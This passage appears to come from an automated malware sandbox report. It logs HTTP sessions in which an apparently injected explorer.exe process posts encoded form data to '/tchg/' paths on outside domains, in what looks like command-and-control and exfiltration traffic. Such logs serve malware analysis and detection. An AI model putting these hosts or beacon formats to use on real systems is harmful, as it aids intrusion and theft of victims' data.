51 44 51 6b 63 38 36 56 5a 51 37 7a 6a 6d 6e 66 47 30 62 33 30 68 42 4f 79 31 46 50 77 6c 63 4f 51 30 7a 50 47 2d 63 57 4b 34 68 49 35 35 58 4d 56 4e 76 41 30 54 4b 65 34 53 39 51 52 31 55 75 4d 5f 51 58 41 31 76 53 30 7a 6f 5a 7e 62 36 77 38 37 4f 43 65 31 31 63 59 6e 64 5a 37 42 57 70 43 43 33 56 6a 64 44 5f 6a 77 68 52 7e 6d 5a 58 41 45 30 5f 75 36 42 4c 50 6d 35 4b 4e 35 68 5f 45 57 4a 79 4c 30 37 72 75 68 67 35 50 56 70 76 74 4a 7e 79 4d 66 79 5a 73 4a 5a 34 6e 6b 67 39 44 43 77 37 77 74 6b 59 73 65 28 68 41 49 66 44 36 33 69 78 70 5a 77 55 6b 69 46 74 75 39 62 44 4f 65 67 54 35 42 68 4b 6c 68 78 42 39 76 6e 79 30 75 77 6e 48 56 34 63 42 55 62 38 6b 77 48 4d 39 47 66 38 71 6c 77 6c 4e 4a 48 39 65 68 68 62 46 4b 45 48 38 73 56 4a 74 33 4e 56 47 30 54 70 5a 33 4b 76 69 6c 74 6d 53 63 38 41 4e 69 6f 42 52 57 79 66 50 4b 71 42 65 68 79 32 59 63 6c 45 54 74 57 2d 69 69 76 5a 61 74 6a 55 28 6f 57 51 72 4b 68 61 35 70 78 35 7e 47 74 62 64 37 50 5a 58 64 6f 6d 4b 57 36 48 35 44 68 54 56 34 32 43 62 41 57 79 43 69 50 79 39 32 63 42 45 76 31 41 53 55 39 75 63 36 49 52 4f 75 58 4e 76 34 37 63 59 34 7a 45 4f 31 52 62 52 6e 44 76 49 77 79 2d 30 72 74 36 48 52 42 33 33 78 77 42 51 6e 54 7a 59 59 41 58 69 71 32 63 58 63 6a 71 54 63 6e 6a 42 71 6a 45 63 45 50 74 30 39 47 61 46 36 55 68 50 65 54 78 65 5f 62 73 77 64 55 77 53 56 39 31 56 6b 4c 57 63 56 31 69 6c 48 6f 63 31 73 41 4b 38 39 39 6b 47 74 75 65 36 57 55 70 7e 36 33 62 76 44 63 54 31 70 43 4c 69 47 4e 6d 6d 47 28 33 44 4c 52 35 6a 72 28 42 6a 75 58 64 31 65 34 57 47 71 54 74 6f 30 6e 7a 61 45 4d 6f 77 39 30 58 6d 69 5a 2d 76 5f 49 55 59 54 66 64 69 38 4f 56 76 5f 4d 42 43 75 65 5f 46 6a 77 35 68 63 4f 4a 49 49 47 44 54 46 4c 38 4e 44 50 46 41 73 74 78 68 4e 62 64 4b 30 7e 74 6f 44 74 46 39 79 71 37 51 52 37 44 6f 32 6c 67 65 73 7e 74 41 6d 39 75 59 58 63 58 71 61 52 77 4a 43 4d 49 63 47 35 6b 6d 37 72 48 59 4f 37 63 66 4a 34 65 31 6e 54 52 47 78 73 55 66 50 76 78 48 61 6b 6f 59 76 67 62 4b 75 53 4a 31 6b 35 71 42 65 71 66 41 64 59 4d 50 52 66 6a 65 62 28 69 35 49 4c 71 33 67 4b 43 59 4e 37 4b 72 2d 4a 77 73 51 6e 30 63 70 44 49 41 39 28 5f 53 47 42 6c 75 49 35 4b 66 59 52 2d 69 42 33 6b 38 70 4b 59 4b 44 43 45 45 76 71 64 5a 31 51 77 76 59 45 53 52 72 37 50 48 6d 6b 48 41 62 62 4f 32 4b 7a 4e 4c 52 37 51 6d 65 59 74 52 73 55 66 48 55 56 35 6c 36 5a 34 74 63 49 6a 30 31 32 55 6d 72 70 30 33 70 69 5a 28 58 44 4c 70 59 45 46 67 37 6d 61 77 54 66 45 78 6d 75 6b 70 38 7e 31 79 5f 70 4f 48 30 78 33 4b 66 52 63 4f 68 5a 33 5a 70 53 37 50 39 4d 31 4e 58 39 71 33 62 45 6c 67 37 70 47 34 54 74 4f 54 5a 4c 51 47 5f 31 73 32 43 45 44 44 72 69 67 49 33 39 69 6b 37 28 6e 37 6a 48 6c 69 79 30 61 6b 79 49 4c 6e 74 6f 39 66 43 73 6d 51 64 36 75 53 38 79 50 52 34 7a 5a 53 6a 4b 6f 65 52 47 7a 50 4f 37 4f 56 42 30 74 61 44 5a 37 57 57 4d 55 72 4a 36 50 6c 42 7e 50 68 79 67 76 28 61 43 34 44 6b 59 6e 76 39 4a 49 35 4d 66 75 55 36 6c 6a 33 4c 36 4a 41 36 38 67 56 49 32 76 54 7a 4f 75 4f 58 77 6b 67 61 49 31 63 76 53 50 38 59 70 69 79 37 70 66 78 48 57 70 65 55 6f 77 63 73 37
                                                                                                                    Data Ascii: O0qEM=FgCEJ5Fgf_XORzp-ksepw2jDo-7BA5dHt7DBQPKC2WlWkxUPWGkiWc5QVpuFYEKrbnIC31H9U0yIFHBl48o_ALwOjHhmw2fEr8g4i41aBsTXMskGlSfj(GZkU9I33ShD5SKCW5AOnPUW0rbpU9tQInuon8xSEIuVc6Vm4pSsLGuxtjrRYPi0QfnR~FrfMJDFq-JWCPPY8WAVlM3_A3yNkS153X10NR98ZYl0ukvpkiZjz4uzpf5ASbu4IMYbdnrP(02bbVTtTiz4VTHi1acYs0v9MB(OjY3KlgrSiWR3lv~rCs(fIFbVV4XsfIclnNLHK7cvOYJts2jYEDTE8gQDQkc86VZQ7zjmnfG0b30hBOy1FPwlcOQ0zPG-cWK4hI55XMVNvA0TKe4S9QR1UuM_QXA1vS0zoZ~b6w87OCe11cYndZ7BWpCC3VjdD_jwhR~mZXAE0_u6BLPm5KN5h_EWJyL07ruhg5PVpvtJ~yMfyZsJZ4nkg9DCw7wtkYse(hAIfD63ixpZwUkiFtu9bDOegT5BhKlhxB9vny0uwnHV4cBUb8kwHM9Gf8qlwlNJH9ehhbFKEH8sVJt3NVG0TpZ3KviltmSc8ANioBRWyfPKqBehy2YclETtW-iivZatjU(oWQrKha5px5~Gtbd7PZXdomKW6H5DhTV42CbAWyCiPy92cBEv1ASU9uc6IROuXNv47cY4zEO1RbRnDvIwy-0rt6HRB33xwBQnTzYYAXiq2cXcjqTcnjBqjEcEPt09GaF6UhPeTxe_bswdUwSV91VkLWcV1ilHoc1sAK899kGtue6WUp~63bvDcT1pCLiGNmmG(3DLR5jr(BjuXd1e4WGqTto0nzaEMow90XmiZ-v_IUYTfdi8OVv_MBCue_Fjw5hcOJIIGDTFL8NDPFAstxhNbdK0~toDtF9yq7QR7Do2lges~tAm9uYXcXqaRwJCMIcG5km7rHYO7cfJ4e1nTRGxsUfPvxHakoYvgbKuSJ1k5qBeqfAdYMPRfjeb(i5ILq3gKCYN7Kr-JwsQn0cpDIA9(_SGBluI5KfYR-iB3k8pKYKDCEEvqdZ1QwvYESRr7PHmkHAbbO2KzNLR7QmeYtRsUfHUV5l6Z4tcIj012Umrp03piZ(XDLpYEFg7mawTfExmukp8~1y_pOH0x3KfRcOhZ3ZpS7P9M1NX9q3bElg7pG4TtOTZLQG_1s2CEDDrigI39ik7(n7jHliy0akyILnto9fCsmQd6uS8yPR4zZSjKoeRGzPO7OVB0taDZ7WWMUrJ6PlB~Phygv(aC4DkYnv9JI5MfuU6lj3L6JA68gVI2vTzOuOXwkgaI1cvSP8Ypiy7pfxHWpeUowcs746IIOL-3yNy6JzFWitMF3snJCn9x48djfUErUZHWONGljzLpCgdbGl4hJfH27lRIyqtgzNYwUU0nUW8eV(rRdVmUrGUQgbKRXi5YPQvm0bRmSuPInrEdqTt7lqV44ON3e43HMNdbttlfcRoXrErVuZlMoAt4DPxSpapNzfYfuYfr81InTa9yiR8WGZNhUKdQ7CauTG0Lul-2EQO31FRuXqTn-vhvHvCjcr0JIF-EteV5xW_F5y7dku9i2pvu5uEWIaG7zlNgWESvGebf9I2dQiP7uC5UT~POkpjbdn39msdrR2w7iUfO2KU67LVhKz5ya2ZbDgfThKfmvxMEWwBVfZfmeyJQs9nZ6A_IWT3Q9ofvAzvOjLQSN00WNqoc3ZbgHgBooiq4thZeIKL1-vzn0lNolEYEMrcwFFtTolAn-0CKQ3HlzGmwmDdPVZyNe8dT1m7eYxIQMogcLmIdb79G8IGZnQ9T03zJ9ykUqgEEVzmuoRJPxzcPfjhbE8xmaGM2EhTbJDwwy18EaT8fjnD4ODFPLLp07aVo6oO0-8qK-DSgCQqgS2nPFJw0mdBMwVRdHWS7t6MXrGrfZbqg_9vHYq0XF7P1FOtuADUyId75FgfU4c1wOSkhjJodhJvGO1N1qNCWnn7xHixaumL4G7oaKdhJcYfaFjDvvqQRdzdizLyp7CLHrgm01lbUwTNcLuwSaKuk8pivaQHFyQ1YVHF3N9_qcJoXav7os9qdwXphJuCCmKY(2zGeRGhyGtY7YUWqhBKR3fM(aeurUxWiDrxEEROlHK74hFRdnDJk8pHAnpJTq7_IkF46SBIa58HTboAOift9wz7KTfCRESNcPHJ4hj3DHJjpWU0YVH-pRDYxc8abIedaVjPTUcbfDpteBVKP5iVgwFo6xE4O5DawhvdIlMvIqzy3PmNLVuLLNDuyX4Rp_BtQpedluojIXVU0w~wzzhlJ57siWZuHcAv(_MWWdOMhUcOgyKVTgntNO4ODxDk6wN58Gqibu2pTvDgqozmad1645EYfnvPSkDf15(TztvBLdBPmqIabK5uosSXlY8G0M(dKuaWbqOEGYx_KF7pdWS4HpFz0dy5~VhWy4~HJdGRbfVi95ms96F97pj6yR3UeQVPqbEls21ymDCJajFErPjPS4jv49XVy6pK5Q(zXEqjgJ0Joy(mx8YDhP5SEtQL~iKS8sWVTlwcY_7ZnSvZNAJN~y3R5_Vr9ik8NRQX(U7AhpN_Uv389LL1O2IueKFTEHfHKuUveAzYxyPnZo0mKFLDqPYrvTOrQOSibnzfXLaeDMshm2KWaj2xgBvkQBCsD_XNoFqCyW68s1fUkZ3WRmdOYETAWNRL5Sa9pJTlLofZeJvVvQEu~IhAnEli3L(8FJ~C4emub1QgSv9EyT(Tkqdk7HfR0CDM2gIqU7fcgH60xtBRF6G065ZDr4zAfNjCiYSXB1ERtCxEyeIFgCG6dz4_djjzOVSAV3jIqBn4JrVm2z3gDBVs8ihYsTZ1yvEtciV6xiaKozccoGX2Q_SH8kL1CEhFoIslhTnVv6lPewHRWXLxWvzPG_3pgb4yC3zMgv1wUM7vEfHnL61DJBjDxFTCBr4x~z0pJxxOVZCt7B3dPDj0xktgvFJxcsfY3QXFa7EbtYKLGmkdM_eFu3wsQpDUgMZXH0BZYaTDe9cRp-bSQwZbnvuD60RkRE7LOpsAiCprVrQ7r5NfLR3JiK899lwToV968AgwPxqS5KpuHTc1u8zuDZ59~aV2eNhlRd9XwEj_ubofOpU0O3RMpQMRGXyPdpV7SozaFp7qCIioYGZIRF4wGFNo3mJcW0sMrnJXhaVFZ9olSccZrwQn491VZS2yUgheFhidmN0pLJvKJOs5OoyN79fm3uvgiXw-WFLOEggdW1pg(BT20YSe2eIlbuac8yX_eFqMPWop5V9OS_9j7yUXNQX9ryesUREmoC2g~WMeGdMwIKMdVUJTQCdbQa9EXSdWubbMLgps1MluJsC-Vv5b4gBzk5W28SWpNaSJBzsT6FBhYePsdAI9052tMHxjectdJWglOFA0Pdyh8HT1uOYKiHdpq2cKU_q17o1dd2iuJe6brhw70dxoEswCl7oFmVyohPduZgNb2-n61fZjm60YTIcBPBQ7(pW27w5J90Q0FuI-r9f9TKBgVWB2PJvWNOUz6M4LBknziPUYtW2Gg2ryiw6KDZ6SyumiE2Wqb5(TdSdEMhU7BaVDzvXtN-SyWQjCzxskxW7Mg3jC9-HKo2SHFku6oPmnY3MsLjSgsRiiOm(StlPv2SEKS2~gu5Z7WF7dNjGfPPuW3IcXgBEnxN8wwYUUhDA32tytP7kkTzlnSYQjUBOo2Wf6F64kn1osGBJ2UhQEQOu9aHeF4UTJjZcd2BVNKdSUFoIDqsnWYHRQD68CVz7er9XBv9f4NtHYOiCBaWhwJoJXuTuG5c1Bp0dXU7TQCEh0rvWdVUCZjq3aJuxL0zEfLm0ViYhLOrn_YXxFrBnfPBpxJlQValhmzSLbZMv57UkqEAVq42N1bUuGiTJTQH2gNXPUZQ6SDjFwv8ebEiAhGoudJ6t4mk36WyDrEUgP0_oZedrcFK8esuhwLXjJVKdbGd4EwlaV~ApU3aoPTtRQ5pyLK-QY7gnN9GfU7nIgf29Bcrv2Qe19TEmC3435DWJRCdRtrhU1fgAUZfmqMtF6Qw(SY3aXOPinX8Dh~7StTZHB
                                                                                                                    May 30, 2023 11:14:09.979279041 CEST1957OUTData Raw: 38 32 61 62 59 69 4a 30 6c 51 42 51 7a 52 34 33 42 61 79 46 6c 52 52 52 75 75 77 56 69 30 61 46 57 6c 61 44 68 4e 56 6e 4e 47 35 45 76 76 68 53 58 73 6b 28 6f 67 76 75 4c 33 55 77 47 46 78 6d 76 4f 56 48 77 6a 57 41 6e 45 69 61 70 71 79 45 65 51
                                                                                                                    Data Ascii: 82abYiJ0lQBQzR43BayFlRRRuuwVi0aFWlaDhNVnNG5EvvhSXsk(ogvuL3UwGFxmvOVHwjWAnEiapqyEeQOJ9iIolqS(I0Egno4k9h_YM(5Nk4chTrV2we7oY1gc4HXQG(Slaiuu90yBrHkhR6HJv6oWyvv8JUpAAeTcoDPKyrOmYzqLA543hwBKkGlWdvdLp9lIBFe(4UyH50AdQQTj-wejEH8Z5lr3DGIsONXjcZstB5FSsuT
                                                                                                                    May 30, 2023 11:14:10.004235029 CEST1957INHTTP/1.1 405 Not Allowed
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Tue, 30 May 2023 09:14:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 157
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>
                                                                                                                    May 30, 2023 11:14:10.004406929 CEST1960OUTData Raw: 5a 5a 65 78 4c 4d 39 4b 71 58 30 52 7a 35 68 66 5f 53 4b 47 2d 6a 69 61 76 73 6b 6c 55 43 44 43 30 33 74 45 55 50 61 48 41 56 74 35 32 70 55 61 44 44 55 6e 55 4c 6a 6e 4b 4f 33 6f 52 51 4f 72 76 7a 57 31 2d 57 50 77 30 6f 4c 51 5f 6b 43 52 47 41
                                                                                                                    Data Ascii: ZZexLM9KqX0Rz5hf_SKG-jiavsklUCDC03tEUPaHAVt52pUaDDUnULjnKO3oRQOrvzW1-WPw0oLQ_kCRGAa4aVf8ThkexRZb6ChhzLV3ydoew0au6RSI3C-aGZR72SfzPBIOQEv6y~E12WsDLSk(iTFuo8RFB4VUgOihb6pXo33f4FBeVlNMq3gm3aNCBaQbqS_q5qQS_TtbkUl84ON4KhWlqP2xbDhVcji(4BP5koD6Gto3tY5
                                                                                                                    May 30, 2023 11:14:10.004585981 CEST1967OUTData Raw: 33 4c 43 70 68 72 6e 4d 42 30 47 4f 54 30 70 34 35 41 59 6e 55 72 4e 67 42 6d 2d 4c 4c 71 31 64 6e 6f 47 4d 55 4c 30 31 43 39 58 7e 70 4c 35 52 79 65 7a 42 7a 34 55 44 46 38 6e 55 76 72 6e 46 4e 45 4f 79 74 49 69 43 2d 68 38 50 55 55 76 55 34 48
                                                                                                                    Data Ascii: 3LCphrnMB0GOT0p45AYnUrNgBm-LLq1dnoGMUL01C9X~pL5RyezBz4UDF8nUvrnFNEOytIiC-h8PUUvU4HEGfJJ5DOCpyb7nrpcIEruIhTsPNrJ7nDUThJvsReD~pk_KVTrcyA_jRyc8PGZcCTJxZPGxadZtVMGAh7VlQP853wrBj~bjhvFKPH4OylY8ulF53qpAE4Q87IeE2wQFVtMxv0IoWJ1DPLgEcqQX3KLYcbqDLt6fcyf
                                                                                                                    May 30, 2023 11:14:10.004776001 CEST1982OUTData Raw: 6d 51 71 77 52 75 49 6b 37 64 79 72 77 35 47 72 69 51 41 41 36 65 78 66 55 41 74 47 51 56 31 73 51 34 43 6b 74 32 62 31 4d 59 53 50 41 65 75 42 70 6b 67 37 37 73 4e 45 4f 37 76 70 4c 44 51 58 4e 54 4b 62 50 45 39 47 53 35 53 4a 64 75 31 49 4c 4f
                                                                                                                    Data Ascii: mQqwRuIk7dyrw5GriQAA6exfUAtGQV1sQ4Ckt2b1MYSPAeuBpkg77sNEO7vpLDQXNTKbPE9GS5SJdu1ILO_PRbgwPrjO-x-fVctHH3GAq8hE6ger_3Fbc4-7iovmDTYhpHNznde5Es511TNN1OJ2JAUJgXegjThtCpn~rr0FdD1uRsBlo8E4samOjpVcwjyGm~VAVjLigGdKO6hWgEApxc5D-nE~6Y8GNdhGOsqs8d5MLINZyQE
                                                                                                                    May 30, 2023 11:14:10.029383898 CEST1988OUTData Raw: 77 39 4c 51 35 6b 61 41 66 34 63 42 6b 41 49 67 44 39 31 36 4f 4b 47 32 54 43 4a 71 50 30 2d 77 38 4b 61 4f 5f 5a 52 65 61 34 75 35 6b 33 33 4e 34 76 34 59 4a 6e 4d 68 39 55 56 34 59 59 45 71 51 56 4d 28 37 78 36 4d 56 71 44 6b 54 6e 4c 7e 41 78
                                                                                                                    Data Ascii: w9LQ5kaAf4cBkAIgD916OKG2TCJqP0-w8KaO_ZRea4u5k33N4v4YJnMh9UV4YYEqQVM(7x6MVqDkTnL~AxyAdZFoZ4H5pBcICHo9LCgCadhZZ3QOocLqdvhfV5Kn9wz1V1X0E~Ef_38H3g61aUqbjLDhx3EwTie(ZecurUM2r0YDnhgzsJPGEgzqibVTOOlDO5NybBEdCOoDPvih9b7lYnezdPvj6Pkz1~1ptN_LBPcxTDBXuaG
                                                                                                                    May 30, 2023 11:14:10.029495001 CEST1993OUTData Raw: 77 4e 6a 67 4f 48 4b 36 5f 41 45 68 62 28 6b 59 39 6f 57 75 57 58 41 41 6d 75 72 64 5f 67 6e 31 72 33 4c 6b 52 4e 6d 52 5a 68 2d 68 51 5a 39 78 6e 64 4b 42 76 71 4a 4c 58 52 56 53 6f 36 6c 38 76 35 57 56 65 54 38 69 77 6d 6c 6c 58 48 42 30 43 38
                                                                                                                    Data Ascii: wNjgOHK6_AEhb(kY9oWuWXAAmurd_gn1r3LkRNmRZh-hQZ9xndKBvqJLXRVSo6l8v5WVeT8iwmllXHB0C8Hz99tBlP48BNfsUzDxeqoPBaeceutP8h0yXOy0fNA9IB4rJmg0lHRAg6FvMwZLoDos58W(9fHVbZ5UpJIHbZKre7aUARYEGGlly8AZ1g1gLwZne~Qzf1bPbkuoDjGGvfPvFSMW7yylepdfthgDXIjhrpmY5fFGB6e
                                                                                                                    May 30, 2023 11:14:10.029819965 CEST1995OUTData Raw: 77 46 63 6c 4e 28 73 36 56 35 36 71 6f 66 38 44 79 73 51 55 31 50 36 4b 5f 79 76 56 56 79 53 39 5a 6e 74 68 71 46 59 7e 55 49 4b 6a 41 6f 45 68 48 48 39 6b 69 31 58 49 74 32 37 53 71 37 4e 57 72 51 48 6c 34 61 51 28 5a 6f 4b 42 51 65 4f 59 36 59
                                                                                                                    Data Ascii: wFclN(s6V56qof8DysQU1P6K_yvVVyS9ZnthqFY~UIKjAoEhHH9ki1XIt27Sq7NWrQHl4aQ(ZoKBQeOY6Y8IJdTRXv4O6MKBD83TMbSwxBeRgOqd3ftPh94(4s00QBAyIdeIHn6GhuCFk9-VR7_VSv2LhZL1zZGEYVSeeui6zLhHzb0uptKO5iL8isiD5ISc4ioPUabqskkRYWqRLrAZVpiUJ7paQEFiOcuEcWk0ra7zTneu5OI
                                                                                                                    May 30, 2023 11:14:10.029985905 CEST1996OUTData Raw: 4b 5a 33 62 67 6f 70 6d 49 76 5a 79 57 66 6f 63 31 53 56 54 56 59 4b 50 79 61 71 6d 65 4a 48 32 4d 52 42 7e 7a 46 68 34 67 6d 33 7e 76 37 35 7e 37 34 50 34 43 33 6a 6c 42 4b 2d 59 5f 46 6b 38 7a 44 63 6a 4c 42 63 35 42 7a 43 67 67 75 31 4b 59 54
                                                                                                                    Data Ascii: KZ3bgopmIvZyWfoc1SVTVYKPyaqmeJH2MRB~zFh4gm3~v75~74P4C3jlBK-Y_Fk8zDcjLBc5BzCggu1KYTJd7K-XVQKDglUSA~1Zd7XYq1Tv0gvyoVqMVtjDD~Yw33KGxULjbJX0TQTB9GUkKT31A2BC8QQz0XVmUkK8EU33oq_fI2aVZqLSSSiXvvIHmSXxYD7sKVguzpFeGtQ4kKB0x88wSLeWo(wo9Ieb_9sNNZyALTEvXum


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    111192.168.11.2049870213.171.195.10580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:14:12.524616003 CEST1997OUTGET /tchg/?2ax=jRqfPy4_lz2&O0qEM=IiqkKM0fZYbcVAhAnum4m1H4t/7jN9R9rdXOIOC6/CZopBQ7QWkcbeNISYKTY0qHDgk4y1fleDCOJFlZ6etMDJwjph9a+HDsvg== HTTP/1.1
                                                                                                                    Host: www.arrangeabreak.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:14:12.549288034 CEST1998INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Tue, 30 May 2023 09:14:12 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 6486
                                                                                                                    Last-Modified: Tue, 10 May 2022 13:33:35 GMT
                                                                                                                    Connection: close
                                                                                                                    ETag: "627a69af-1956"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    May 30, 2023 11:14:12.549356937 CEST1999INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title>
                                                                                                                    May 30, 2023 11:14:12.549423933 CEST2000INData Raw: 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 20 63 61 72 64 2d 74 69 74 6c 65 2d 6c 67 22 3e 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: ass="card-title card-title-lg">Looking to buy a similar domain to</p> <p class="card-subtitle"><span class="domainVar"></span>?</p> <a class="btn btn-primary" onclick="searchSimilarDomains()" rel="nofollow">STAR
                                                                                                                    May 30, 2023 11:14:12.549489021 CEST2002INData Raw: 45 6c 6c 69 70 73 65 5f 32 37 30 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 45 6c 6c 69 70 73 65 20 32 37 30 36 22 20 63 78 3d 22 35 35 22 20 63 79 3d 22 34 35 2e 35 22 20 72 78 3d 22 35 35 22 20 72 79 3d 22 34 35 2e 35 22 20 74 72 61 6e 73 66 6f
                                                                                                                    Data Ascii: Ellipse_2706" data-name="Ellipse 2706" cx="55" cy="45.5" rx="55" ry="45.5" transform="translate(1085 526)" fill="#ffda84"/> <g id="Group_12722" data-name="Group 12722" transform="translate(1119.711 505.758)">
                                                                                                                    May 30, 2023 11:14:12.549552917 CEST2003INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 50 61 74 68 5f 31 36 37 38 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 31 36 37 38 31 22 20 64 3d 22 4d 2d 33 34 34 2e
                                                                                                                    Data Ascii: <path id="Path_16781" data-name="Path 16781" d="M-344.883,357.87a.085.085,0,0,1-.164,0,5.343,5.343,0,0,0-1.362-2.345,5.35,5.35,0,0,0-2.36-1.37.085.085,0,0,1,0-.164,5.459,5.459,0,0,0,2.382-1.415,5.458,5.458,0,0,0,1.3
                                                                                                                    May 30, 2023 11:14:12.549609900 CEST2004INData Raw: 6c 65 22 3e 41 63 63 65 73 73 20 61 6c 6c 20 74 68 65 20 74 6f 6f 6c 73 20 79 6f 75 20 6e 65 65 64 20 66 6f 72 20 6f 6e 6c 69 6e 65 20 73 75 63 63 65 73 73 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: le">Access all the tools you need for online success.</p> <a class="btn hooverable btn-secondary btn-fix" href="https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking
                                                                                                                    May 30, 2023 11:14:12.549669027 CEST2004INData Raw: 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 68 5f 70 61 72 6b 69 6e 67 5f 64 61 63 60 3b 0a 7d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                    Data Ascii: rral&utm_campaign=fh_parking_dac`;}</script></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    12192.168.11.204977123.104.137.18580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:38.161920071 CEST455OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.tsygy.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.tsygy.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.tsygy.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 77 5a 70 44 62 4c 57 31 62 64 51 48 31 4d 70 4a 55 4e 56 79 46 41 56 6b 59 56 62 64 49 67 65 4c 43 33 56 34 4e 68 46 6b 72 36 79 42 75 69 74 55 67 5f 70 67 51 4e 6d 7a 6c 45 79 79 49 5f 48 55 4a 38 48 33 55 36 36 7a 4a 44 4e 7a 32 65 36 46 78 5a 53 5a 67 63 42 2d 41 41 68 38 42 6f 4b 61 6c 35 33 6e 41 35 6e 58 7a 6e 32 5f 55 51 58 53 6a 46 28 50 7e 33 64 4c 50 6f 6c 34 63 67 77 75 74 66 54 53 44 50 66 35 31 41 41 4e 56 49 6a 7a 45 76 6f 43 63 48 6c 62 7e 42 6b 56 61 4c 55 6d 37 67 67 69 36 51 7a 54 6d 2d 55 71 76 51 35 70 6d 79 54 59 68 6f 6d 72 42 43 6a 61 57 66 62 61 4b 52 70 78 36 62 54 2d 28 5a 59 78 4a 49 65 6a 76 77 75 49 70 4a 56 4f 33 31 6f 4b 28 50 55 42 4a 33 42 35 76 7a 77 5a 72 36 45 56 49 47 42 2d 42 38 46 58 6f 6d 28 50 6c 69 71 39 42 57 35 54 38 48 51 6f 70 42 49 6c 31 5a 67 66 36 49 6b 41 37 6a 72 5a 75 67 59 42 42 64 65 53 4e 6b 6b 46 6c 52 4e 74 4c 74 68 49 72 4c 43 4a 68 66 68 6d 72 45 70 59 31 6e 49 61 6f 32 66 5a 50 31 36 44 45 53 28 67 37 72 49 78 72 48 31 67 71 69 59 65 56 42 66 4d 71 39 28 6d 6f 63 64 71 52 49 44 31 79 4a 76 48 39 36 62 33 4e 78 32 41 32 73 77 69 47 6d 61 43 6b 4c 49 7a 77 39 5a 4c 36 30 56 72 38 75 61 35 47 31 31 49 75 51 78 56 66 58 62 54 5a 7a 73 78 47 58 75 50 53 2d 74 52 78 30 30 72 35 6f 4c 30 63 53 51 42 45 4e 4f 72 50 61 58 6e 49 6c 6d 77 6e 64 61 58 6f 6b 49 33 66 76 49 4b 4a 61 5a 30 6f 65 53 46 6e 42 37 6f 4b 7a 41 38 62 4e 6b 74 31 51 65 51 47 6b 37 50 74 33 48 66 39 36 45 78 6d 55 53 49 6e 54 30 53 75 70 30 66 30 69 45 78 30 49 34 4b 54 7a 6b 52 70 5f 5a 59 5a 4a 67 75 71 4e 55 2e 00 00 00 00 00 00 00 00
